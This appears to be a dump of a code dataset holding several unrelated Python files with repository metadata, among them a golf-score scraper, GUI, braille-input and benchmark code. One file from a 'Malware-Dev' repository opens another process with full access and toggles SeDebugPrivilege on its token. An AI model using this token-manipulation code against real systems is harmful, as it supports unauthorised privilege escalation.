model = re.search(r"(?<=ReactDOM.hydrate\(React.createElement\(Golfshot.Applications.Scorecard, )(.*)(?=\), document.getElementById)", data).group()
self.results = json.loads(model)
class CourseParser(HTMLParser):
def handle_data(self, data):
if 'Golfshot.Applications.CourseScorecard' in data:
model = re.search(r'(?<=ReactDOM.hydrate\(React.createElement\(Golfshot.Applications.CourseScorecard, )(.*)(?=\), document.getElementById)', data).group()
self.results = json.loads(model)
def download_course(session, course_id):
COURSE_URL = f'{GOLFSHOT_URL}/courses/{course_id}'
res = session.get(COURSE_URL)
p = CourseParser()
p.feed(res.text)
course_uuid = p.results['source'].split('/')[-2]
scorecard = session.get(p.results['source']).json()['scorecard'] # remove unused siblings
with open('data/courses/%s.json' % course_id, 'w') as f:
ret = {'courseId': course_id,
'courseUuid': course_uuid,
'scorecard': scorecard}
json.dump(ret, f)
def download_round(session, profile_id, round_id):
ROUND_URL = f'{GOLFSHOT_URL}/profiles/{profile_id}/rounds/{round_id}'
res = session.get(ROUND_URL)
p = RoundParser()
p.feed(res.text)
with open('data/rounds/%s.json' % p.results['roundGroupId'], 'w') as f:
json.dump(p.results, f)
download_course(session, p.results['model']['detail']['golfCourseWebId'])
def download_rounds(session, profile_id, last_round=None):
ROUNDS_URL = f'{GOLFSHOT_URL}/profiles/{profile_id}/rounds'
params = {'sb': 'Date', 'sd': 'Descending', 'p': 1}
download_rounds = True
while download_rounds:
rounds_html = session.get(ROUNDS_URL, data=params).text
soup = BeautifulSoup(rounds_html, 'html.parser')
round_table = soup.find('table', {'class': 'search-results'})
if not round_table:
download_rounds = False
break
for row in round_table.tbody.findAll('tr'):
round_id = row.attrs['data-href'].split('/')[-1]
if round_id == last_round:
download_rounds = False
break
print('Downloading %s...' % round_id)
download_round(session, profile_id, round_id)
params['p'] += 1
parser = argparse.ArgumentParser(description='Download GolfShot data')
parser.add_argument('username', help='Username for GolfShot account')
parser.add_argument('password', help='Password for GolfShot account')
parser.add_argument('profile_id', help='Profile ID for GolfShot account')
parser.add_argument('--until', help='Download rounds until specified round (by descending date)')
args = parser.parse_args()
with requests.Session() as session:
tokenRequest = session.get(f'{GOLFSHOT_URL}/signin')
parser = etree.HTMLParser()
tree = etree.fromstring(tokenRequest.text, parser)
verificationToken = tree.xpath('//form//input[@name="__RequestVerificationToken"]/@value')[0]
signin = session.post(f'{GOLFSHOT_URL}/signin',
data={'Email': args.username,
'Password': args.password,
'__RequestVerificationToken': verificationToken,
})
download_rounds(session, args.profile_id, args.until)
| 2,151 | 19 | 163 |
195f9f62c5e9e58bb63a7defda4ff1c86c175351 | 1,719 | py | Python | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | 1 | 2015-01-12T01:19:13.000Z | 2015-01-12T01:19:13.000Z | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | null | null | null | examples/pyqtcom/mainwindow_UI.py | chinnurtb/distrex | a97a086050af6c799c86dadd3d2eb5c4ecb9b21c | [
"BSD-4-Clause"
] | null | null | null | from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
| 47.75 | 139 | 0.706225 | from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(800, 756)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.gridLayout = QtGui.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.tableWidget = QtGui.QTableWidget(self.centralwidget)
self.tableWidget.setColumnCount(3)
self.tableWidget.setObjectName(_fromUtf8("tableWidget"))
self.tableWidget.setRowCount(0)
self.LockButton = QtGui.QPushButton(self.centralwidget)
self.LockButton.setText("Lock")
self.UnlockButton = QtGui.QPushButton(self.centralwidget)
self.UnlockButton.setText("Unlock")
self.gridLayout.addWidget(self.tableWidget, 0, 0, 1, 1)
self.gridLayout.addWidget(self.LockButton, 2, 2, 2, 2)
self.gridLayout.addWidget(self.UnlockButton, 2, 1, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
QtCore.QObject.connect(self.LockButton, QtCore.SIGNAL("clicked()"), MainWindow.lock)
QtCore.QObject.connect(self.UnlockButton, QtCore.SIGNAL("clicked()"), MainWindow.unlock)
def retranslateUi(self, MainWindow):
MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "Distrex PyQt tester", None, QtGui.QApplication.UnicodeUTF8))
| 1,496 | 7 | 81 |
4b805d7ef26b22a989836bce1b521bf8bf18807d | 5,618 | py | Python | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | 46 | 2022-01-30T14:29:02.000Z | 2022-03-25T03:49:13.000Z | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | null | null | null | src/os-specific/windows/token/modify_token.py | shownadda/Malware-Dev | a3fb40371bb4c4f41c582747af41ae8800050f5c | [
"Unlicense"
] | 1 | 2022-03-05T03:42:55.000Z | 2022-03-05T03:42:55.000Z | ## Modify Process Token
# Global Imports
import ctypes
from ctypes.wintypes import DWORD
# Grab a handle on Advapi.dll, User32.dll and Kernel32.dll
a_handle = ctypes.WinDLL("Advapi32.dll")
u_handle = ctypes.WinDLL("User32.dll")
k_handle = ctypes.WinDLL("Kernel32.dll")
# Shortcut to give "All Access" rights to the current process.
# The |'s are being used as "or" statements, as a shortcut instead of typing out every variable needed, and their values.
PROCESS_ALL_ACCESS = ( 0x000f0000 | 0x00100000 | 0xFFF)
# Also used in C# Libraries
# 2 is enabled, 0 is disabled
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000 #
STANDARD_RIGHTS_READ = 0x00020000 #
TOKEN_ASSIGN_PRIMARY = 0x0001 #
TOKEN_DUPLICATE = 0x0002 #
TOKEN_IMPERSONATION = 0x0004 #
TOKEN_QUERY = 0x0008 #
TOKEN_QUERY_SOURCE = 0x0010 #
TOKEN_ADJUST_PRIVILEGES = 0x0020 #
TOKEN_ADJUST_GROUPS = 0x0040 #
TOKEN_ADJUST_DEFAULT = 0x0080 #
TOKEN_ADJUST_SESSIONID = 0x0100 #
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) #
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
# Grab the Window Name from User32.dll
lpWindowName = ctypes.c_char_p(input("Enter Window name to hook into: ").encode('utf-8'))
hWnd = u_handle.FindWindowA(None, lpWindowName)
if hWnd == 0:
print("Error Code: {0} - Could not grab Process Handle! Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("Successfuly got Handle.")
lpdwProcessId = ctypes.c_ulong()
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
if response == 0:
print("Error Code: {0} - Could not grab PID from Handle! Error Code: {0}".format(k_handle.GetlastError))
exit(1)
else:
print("Successfuly got PID!")
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = lpdwProcessId
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
if hProcess <= 0:
print("Error Code {0} - Could not grab Priv Handle".format(k_handle.GetLastError()))
else:
print("Successfully grabbed higher privileges!")
# Open a Handle to the Process's Token Directly
ProcessHandle = hProcess
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
if response > 0:
print("Handle to Process Token created! Token: {0}".format(TokenHandle))
else:
print("Error: could not grab priviledged Token Handle! Error Code: {0}".format(k_handle.GetLastError()))
lpSystemName = None
lpName = "SEDebugPrivilege"
lpLuid = LUID()
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(lpLuid))
if response > 0:
print("Successfully found the LUID!")
else:
print("Error: could not grab LUID! Error Code: {0}".format(k_handle.GetLastError()))
print("LUID VALUE HIGH: {0} \nLUID VALUE LOW: {1}".format(lpLuid.HighPart, lpLuid.LowPart))
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES()
requiredPrivileges.Privileges.Luid = lpLuid
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
if response > 0:
print("Successfully ran Privilege check!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
if pfResult:
print("Privilege Enabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_DISABLED
else:
print("Privileges Disabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength =ctypes.c_void_p()
NewState.PrivilegeCount = 1
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
if response > 0:
print("Token was successfully modified!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
| 33.242604 | 122 | 0.681737 | ## Modify Process Token
# Global Imports
import ctypes
from ctypes.wintypes import DWORD
# Grab a handle on Advapi.dll, User32.dll and Kernel32.dll
a_handle = ctypes.WinDLL("Advapi32.dll")
u_handle = ctypes.WinDLL("User32.dll")
k_handle = ctypes.WinDLL("Kernel32.dll")
# Shortcut to give "All Access" rights to the current process.
# The |'s are being used as "or" statements, as a shortcut instead of typing out every variable needed, and their values.
PROCESS_ALL_ACCESS = ( 0x000f0000 | 0x00100000 | 0xFFF)
# Also used in C# Libraries
# 2 is enabled, 0 is disabled
SE_PRIVILEGE_ENABLED = 0x00000002
SE_PRIVILEGE_DISABLED = 0x00000000
# Token Access Rights
STANDARD_RIGHTS_REQUIRED = 0x000F0000 #
STANDARD_RIGHTS_READ = 0x00020000 #
TOKEN_ASSIGN_PRIMARY = 0x0001 #
TOKEN_DUPLICATE = 0x0002 #
TOKEN_IMPERSONATION = 0x0004 #
TOKEN_QUERY = 0x0008 #
TOKEN_QUERY_SOURCE = 0x0010 #
TOKEN_ADJUST_PRIVILEGES = 0x0020 #
TOKEN_ADJUST_GROUPS = 0x0040 #
TOKEN_ADJUST_DEFAULT = 0x0080 #
TOKEN_ADJUST_SESSIONID = 0x0100 #
TOKEN_READ = (STANDARD_RIGHTS_READ | TOKEN_QUERY) #
TOKEN_ALL_ACCESS = (STANDARD_RIGHTS_REQUIRED |
TOKEN_ASSIGN_PRIMARY |
TOKEN_DUPLICATE |
TOKEN_IMPERSONATION |
TOKEN_QUERY |
TOKEN_QUERY_SOURCE |
TOKEN_ADJUST_PRIVILEGES |
TOKEN_ADJUST_GROUPS |
TOKEN_ADJUST_DEFAULT |
TOKEN_ADJUST_SESSIONID)
class LUID(ctypes.Structure):
_fields_ = [
("LowPart", DWORD),
("HighPart", DWORD),
]
class LUID_AND_ATTRIBUTES(ctypes.Structure):
_fields_ = [
("Luid", LUID),
("Attritbutes", DWORD),
]
class PRIVILEGE_SET(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Control", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
class TOKEN_PRIVILEGES(ctypes.Structure):
_fields_ = [
("PrivilegeCount", DWORD),
("Privileges", LUID_AND_ATTRIBUTES),
]
# Grab the Window Name from User32.dll
lpWindowName = ctypes.c_char_p(input("Enter Window name to hook into: ").encode('utf-8'))
hWnd = u_handle.FindWindowA(None, lpWindowName)
if hWnd == 0:
print("Error Code: {0} - Could not grab Process Handle! Error Code: {0}".format(k_handle.GetLastError()))
exit(1)
else:
print("Successfuly got Handle.")
lpdwProcessId = ctypes.c_ulong()
response = u_handle.GetWindowThreadProcessId(hWnd, ctypes.byref(lpdwProcessId))
if response == 0:
print("Error Code: {0} - Could not grab PID from Handle! Error Code: {0}".format(k_handle.GetlastError))
exit(1)
else:
print("Successfuly got PID!")
dwDesiredAccess = PROCESS_ALL_ACCESS
bInheritHandle = False
dwProcessId = lpdwProcessId
hProcess = k_handle.OpenProcess(dwDesiredAccess, bInheritHandle, dwProcessId)
if hProcess <= 0:
print("Error Code {0} - Could not grab Priv Handle".format(k_handle.GetLastError()))
else:
print("Successfully grabbed higher privileges!")
# Open a Handle to the Process's Token Directly
ProcessHandle = hProcess
DesiredAccess = TOKEN_ALL_ACCESS
TokenHandle = ctypes.c_void_p()
response = k_handle.OpenProcessToken(ProcessHandle, DesiredAccess, ctypes.byref(TokenHandle))
if response > 0:
print("Handle to Process Token created! Token: {0}".format(TokenHandle))
else:
print("Error: could not grab priviledged Token Handle! Error Code: {0}".format(k_handle.GetLastError()))
lpSystemName = None
lpName = "SEDebugPrivilege"
lpLuid = LUID()
response = a_handle.LookupPrivilegeValueW(lpSystemName, lpName, ctypes.byref(lpLuid))
if response > 0:
print("Successfully found the LUID!")
else:
print("Error: could not grab LUID! Error Code: {0}".format(k_handle.GetLastError()))
print("LUID VALUE HIGH: {0} \nLUID VALUE LOW: {1}".format(lpLuid.HighPart, lpLuid.LowPart))
requiredPrivileges = PRIVILEGE_SET()
requiredPrivileges.PrivilegeCount = 1
requiredPrivileges.Privileges = LUID_AND_ATTRIBUTES()
requiredPrivileges.Privileges.Luid = lpLuid
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
pfResult = ctypes.c_long()
response = a_handle.PrivilegeCheck(TokenHandle, ctypes.byref(requiredPrivileges), ctypes.byref(pfResult))
if response > 0:
print("Successfully ran Privilege check!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
if pfResult:
print("Privilege Enabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_DISABLED
else:
print("Privileges Disabled: {0}".format(lpName))
requiredPrivileges.Privileges.Attributes = SE_PRIVILEGE_ENABLED
DisableAllPrivileges = False
NewState = TOKEN_PRIVILEGES()
BufferLength = ctypes.sizeof(NewState)
PreviousState = ctypes.c_void_p()
ReturnLength =ctypes.c_void_p()
NewState.PrivilegeCount = 1
NewState.Privileges = requiredPrivileges.Privileges
response = a_handle.AdjustTokenPrivileges(
TokenHandle,
DisableAllPrivileges,
ctypes.byref(NewState),
BufferLength,
ctypes.byref(PreviousState),
ctypes.byref(ReturnLength))
if response > 0:
print("Token was successfully modified!")
else:
print("Error: Was unable to check Privileges! Error Code: {0}".format(k_handle.GetLastError()))
| 0 | 478 | 100 |
3a7284fda4bbc14d07099918c87da08e457cc884 | 277 | py | Python | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
] | null | null | null | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
] | null | null | null | doodledashboard/filters/filter.py | fossabot/Doodle-Dashboard | 147f5074afd594c47553a115358783b3f91043f0 | [
"MIT"
] | null | null | null | from abc import ABC, abstractmethod
| 17.3125 | 35 | 0.66065 | from abc import ABC, abstractmethod
class MessageFilter(ABC):
def __init__(self):
self._successor = None
@abstractmethod
def filter(self, text_entity):
pass
@staticmethod
@abstractmethod
def get_config_factory():
return None
| 75 | 142 | 23 |
e176e8f1cee58c069ecdbb88cf40ac41ba41119d | 709 | py | Python | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | Taller_Estructuras_de_Control_Secuenciales/Ejercicio_15.py | LeonardoJimenezUbaque/Algoritmos_y_Programacion_C4_G2 | 7bb6fffa7d5d99ac2b5c0a3724f97a84e145bbb7 | [
"MIT"
] | null | null | null | """
Ejercicio 15
Dados como datos el precio final pagado por un producto y su precio de venta al pรบblico (PVP), se requiere
que calcule y muestre el porcentaje de descuento que le ha sido aplicado.
Entradas
Precio_Final_Pagado --> Float --> P_F
Precio_Venta_Publico --> Float --> P_V_P
Salidas
Porcentaje_Descuento --> Float --> P_D
"""
# Instrucciones al usuario
print("Para conocer el porcentaje de descuento, escriba lo siguiente: ")
# Entradas
P_F = float(input("Digite el precio final pagado por el producto: "))
P_V_P = float(input("Digite el precio de venta al pรบblico del producto: "))
# Caja negra
P_D = ((P_V_P-P_F)/P_V_P)*100
# Salidas
print(f"El porcentaje de descuento aplicado es de: {P_D}%")
| 32.227273 | 106 | 0.744711 | """
Ejercicio 15
Dados como datos el precio final pagado por un producto y su precio de venta al pรบblico (PVP), se requiere
que calcule y muestre el porcentaje de descuento que le ha sido aplicado.
Entradas
Precio_Final_Pagado --> Float --> P_F
Precio_Venta_Publico --> Float --> P_V_P
Salidas
Porcentaje_Descuento --> Float --> P_D
"""
# Instrucciones al usuario
print("Para conocer el porcentaje de descuento, escriba lo siguiente: ")
# Entradas
P_F = float(input("Digite el precio final pagado por el producto: "))
P_V_P = float(input("Digite el precio de venta al pรบblico del producto: "))
# Caja negra
P_D = ((P_V_P-P_F)/P_V_P)*100
# Salidas
print(f"El porcentaje de descuento aplicado es de: {P_D}%")
| 0 | 0 | 0 |
ffd083841407fefac167ebacd9988307729e3322 | 3,021 | py | Python | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2019-10-26T04:13:35.000Z | 2019-10-26T04:13:35.000Z | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2017-08-08T00:44:17.000Z | 2017-08-08T00:44:17.000Z | source/brailleInput.py | davidhilton936/clone | 0889f95ef2d74f43b2c98f4d45bf09b0c605f1de | [
"bzip2-1.0.6"
] | 1 | 2020-04-30T19:14:00.000Z | 2020-04-30T19:14:00.000Z | #brailleInput.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2013 NV Access Limited, Rui Batista
import os.path
import louis
import braille
import config
from logHandler import log
import winUser
import inputCore
"""Framework for handling braille input from the user.
All braille input is represented by a {BrailleInputGesture}.
Normally, all that is required is to create and execute a L{BrailleInputGesture},
as there are built-in gesture bindings for braille input.
"""
#: The singleton BrailleInputHandler instance.
#: @type: L{BrailleInputHandler}
handler = None
class BrailleInputHandler(object):
"""Handles braille input.
"""
def input(self, dots):
"""Handle one cell of braille input.
"""
# liblouis requires us to set the highest bit for proper use of dotsIO.
char = unichr(dots | 0x8000)
text = louis.backTranslate(
[os.path.join(braille.TABLES_DIR, config.conf["braille"]["inputTable"]),
"braille-patterns.cti"],
char, mode=louis.dotsIO)
chars = text[0]
if len(chars) > 0:
self.sendChars(chars)
class BrailleInputGesture(inputCore.InputGesture):
"""Input (dots and/or space bar) from a braille keyboard.
This could either be as part of a braille display or a stand-alone unit.
L{dots} and L{space} should be set appropriately.
"""
#: Bitmask of pressed dots.
#: @type: int
dots = 0
#: Whether the space bar is pressed.
#: @type: bool
space = False
| 28.5 | 86 | 0.709037 | #brailleInput.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2012-2013 NV Access Limited, Rui Batista
import os.path
import louis
import braille
import config
from logHandler import log
import winUser
import inputCore
"""Framework for handling braille input from the user.
All braille input is represented by a {BrailleInputGesture}.
Normally, all that is required is to create and execute a L{BrailleInputGesture},
as there are built-in gesture bindings for braille input.
"""
#: The singleton BrailleInputHandler instance.
#: @type: L{BrailleInputHandler}
handler = None
def initialize():
global handler
handler = BrailleInputHandler()
log.info("Braille input initialized")
def terminate():
global handler
handler = None
class BrailleInputHandler(object):
"""Handles braille input.
"""
def input(self, dots):
"""Handle one cell of braille input.
"""
# liblouis requires us to set the highest bit for proper use of dotsIO.
char = unichr(dots | 0x8000)
text = louis.backTranslate(
[os.path.join(braille.TABLES_DIR, config.conf["braille"]["inputTable"]),
"braille-patterns.cti"],
char, mode=louis.dotsIO)
chars = text[0]
if len(chars) > 0:
self.sendChars(chars)
def sendChars(self, chars):
inputs = []
for ch in chars:
for direction in (0,winUser.KEYEVENTF_KEYUP):
input = winUser.Input()
input.type = winUser.INPUT_KEYBOARD
input.ii.ki = winUser.KeyBdInput()
input.ii.ki.wScan = ord(ch)
input.ii.ki.dwFlags = winUser.KEYEVENTF_UNICODE|direction
inputs.append(input)
winUser.SendInput(inputs)
class BrailleInputGesture(inputCore.InputGesture):
"""Input (dots and/or space bar) from a braille keyboard.
This could either be as part of a braille display or a stand-alone unit.
L{dots} and L{space} should be set appropriately.
"""
#: Bitmask of pressed dots.
#: @type: int
dots = 0
#: Whether the space bar is pressed.
#: @type: bool
space = False
def _get_identifiers(self):
if self.space and self.dots:
dotsString = "+".join("dot%d" % (i+1) for i in xrange(8) if self.dots & (1 << i))
return ("bk:space+%s" % dotsString,
"bk:space+dots")
elif self.dots or self.space:
return ("bk:dots",)
else:
return ()
def _get_displayName(self):
if not self.dots and not self.space:
return None
# Translators: Reported before braille input in input help mode.
out = [_("braille")]
if self.space and self.dots:
# Translators: Reported when braille space is pressed with dots in input help mode.
out.append(_("space with dot"))
elif self.dots:
# Translators: Reported when braille dots are pressed in input help mode.
out.append(_("dot"))
elif self.space:
# Translators: Reported when braille space is pressed in input help mode.
out.append(_("space"))
if self.dots:
for dot in xrange(8):
if self.dots & (1 << dot):
out.append(str(dot + 1))
return " ".join(out)
| 1,381 | 0 | 118 |
3dcf6942a7a97ee219cc62d3971216e7115616cc | 3,477 | py | Python | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | 1 | 2022-03-01T13:29:16.000Z | 2022-03-01T13:29:16.000Z | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | null | null | null | gutenTAG/base_oscillations/utils/consolidator.py | HPI-Information-Systems/gutentag | 5638dadf9b1e83699ca317ce9eb4569a6c350064 | [
"MIT"
] | null | null | null | from typing import List, Optional, Tuple
import numpy as np
from gutenTAG.anomalies import AnomalyProtocol, LabelRange, Anomaly
from gutenTAG.base_oscillations.interface import BaseOscillationInterface
| 47.630137 | 155 | 0.67472 | from typing import List, Optional, Tuple
import numpy as np
from gutenTAG.anomalies import AnomalyProtocol, LabelRange, Anomaly
from gutenTAG.base_oscillations.interface import BaseOscillationInterface
class Consolidator:
def __init__(self, base_oscillations: List[BaseOscillationInterface], anomalies: List[Anomaly]):
self.consolidated_channels: List[BaseOscillationInterface] = base_oscillations
self.anomalies: List[Anomaly] = anomalies
self.generated_anomalies: List[Tuple[AnomalyProtocol, int]] = []
self.timeseries: Optional[np.ndarray] = None
self.labels: Optional[np.ndarray] = None
def add_channel(self, channel: BaseOscillationInterface):
self.consolidated_channels.append(channel)
def get_channel(self, channel: int) -> BaseOscillationInterface:
return self.consolidated_channels[channel]
def generate(self) -> Tuple[np.ndarray, np.ndarray]:
channels: List[np.ndarray] = []
for c, bo in enumerate(self.consolidated_channels):
bo.generate_timeseries_and_variations(c, prev_channels=channels) # type: ignore # timeseries gets set in generate_timeseries_and_variations()
if bo.timeseries is not None:
channels.append(bo.timeseries)
self.timeseries = self._stack_channels(channels)
self.labels = np.zeros(self.timeseries.shape[0], dtype=np.int8)
self.generate_anomalies()
self.apply_anomalies()
self.apply_variations()
return self.timeseries, self.labels
def apply_variations(self):
for c, bo in enumerate(self.consolidated_channels):
self.timeseries[:, c] += bo.noise + bo.trend_series + bo.offset
def apply_anomalies(self):
label_ranges: List[LabelRange] = []
for (protocol, channel) in self.generated_anomalies:
if len(protocol.subsequences) > 0:
subsequence = np.vstack(protocol.subsequences).sum(axis=0)
self.timeseries[protocol.start:protocol.end, channel] = subsequence
label_ranges.append(protocol.labels)
self._add_label_ranges_to_labels(label_ranges)
def generate_anomalies(self):
positions: List[Tuple[int, int]] = []
for anomaly in self.anomalies:
current_base_oscillation = self.consolidated_channels[anomaly.channel]
anomaly_protocol = anomaly.generate(current_base_oscillation,
current_base_oscillation.get_timeseries_periods(),
current_base_oscillation.get_base_oscillation_kind(),
positions)
positions.append((anomaly_protocol.start, anomaly_protocol.end))
self.generated_anomalies.append((anomaly_protocol, anomaly.channel))
def _stack_channels(self, channels: List[np.ndarray]) -> np.ndarray:
assert all([len(x.shape) == 1 for x in channels]), "The resulting channels have the wrong shape. Correct shape: `(l, d)`."
return np.vstack(channels).transpose()
def _add_label_ranges_to_labels(self, label_ranges: List[LabelRange]):
if self.labels is not None:
for label_range in label_ranges:
self.labels[label_range.start:label_range.start + label_range.length] = 1
else:
raise AssertionError("You cannot run this method before initializing the `labels` field!")
| 3,008 | -2 | 265 |
927514758cfa6089deece09c9319a8bda7feab28 | 1,064 | py | Python | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | 6 | 2018-07-18T06:38:42.000Z | 2021-11-17T21:01:40.000Z | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | null | null | null | CEGO/testFunctions/DTLZ8.py | napa-jmm/CEGO | 172d511133a608ca5bf265d9ebd2937b8a171b3e | [
"MIT"
] | 6 | 2018-10-15T09:35:24.000Z | 2021-05-08T13:40:19.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 11:06:16 2018
@author: r.dewinter
"""
import numpy as np
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
#rngMin = np.zeros(9)
#rngMax = np.ones(9)
#nVar = 9
#ref = np.array([1,1,1])
#parameters = np.empty((200,9))
#objectives = np.empty((200,3))
#constraints = np.empty((200,3))
#objectives[:] = 0
#constraints[:] = 0
#parameters[:]= 0
#for i in range(200):
# x = np.random.rand(nVar)*(rngMax-rngMin)+rngMin
# parameters[i] = x
# obj, cons = DTLZ8(x)
# objectives[i] = obj
# constraints[i] = cons
#
#a = np.sum(constraints<0, axis=1)==3
##sum(a)
#fig = plt.figure()
#ax = fig.add_subplot(111,projection='3d')
#ax.scatter(objectives[a][:,0], objectives[a][:,1], objectives[a][:,2])
#fig.show() | 23.644444 | 72 | 0.56391 | # -*- coding: utf-8 -*-
"""
Created on Mon Mar 5 11:06:16 2018
@author: r.dewinter
"""
import numpy as np
def DTLZ8(x):
f1 = 1/3*np.sum(x[:3])
f2 = 1/3*np.sum(x[3:6])
f3 = 1/3*np.sum(x[6:])
g1 = f3+4*f1-1
g2 = f3+4*f2-1
g3 = 2*f3+f1+f2-1
return np.array([f1,f2, f3]), -1*np.array([g1,g2,g3])
#import matplotlib.pyplot as plt
#from mpl_toolkits.mplot3d import Axes3D
#rngMin = np.zeros(9)
#rngMax = np.ones(9)
#nVar = 9
#ref = np.array([1,1,1])
#parameters = np.empty((200,9))
#objectives = np.empty((200,3))
#constraints = np.empty((200,3))
#objectives[:] = 0
#constraints[:] = 0
#parameters[:]= 0
#for i in range(200):
# x = np.random.rand(nVar)*(rngMax-rngMin)+rngMin
# parameters[i] = x
# obj, cons = DTLZ8(x)
# objectives[i] = obj
# constraints[i] = cons
#
#a = np.sum(constraints<0, axis=1)==3
##sum(a)
#fig = plt.figure()
#ax = fig.add_subplot(111,projection='3d')
#ax.scatter(objectives[a][:,0], objectives[a][:,1], objectives[a][:,2])
#fig.show() | 217 | 0 | 25 |
583b74e40fc0ea58b61f300685cd5e11e60972b3 | 2,747 | py | Python | vectorize.py | orestislabridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
] | 1 | 2021-01-09T09:21:02.000Z | 2021-01-09T09:21:02.000Z | vectorize.py | orestislabridis/X-SPELLS | 4285888ef2c9cc5ef59756d363319599d8599e69 | [
"Apache-2.0"
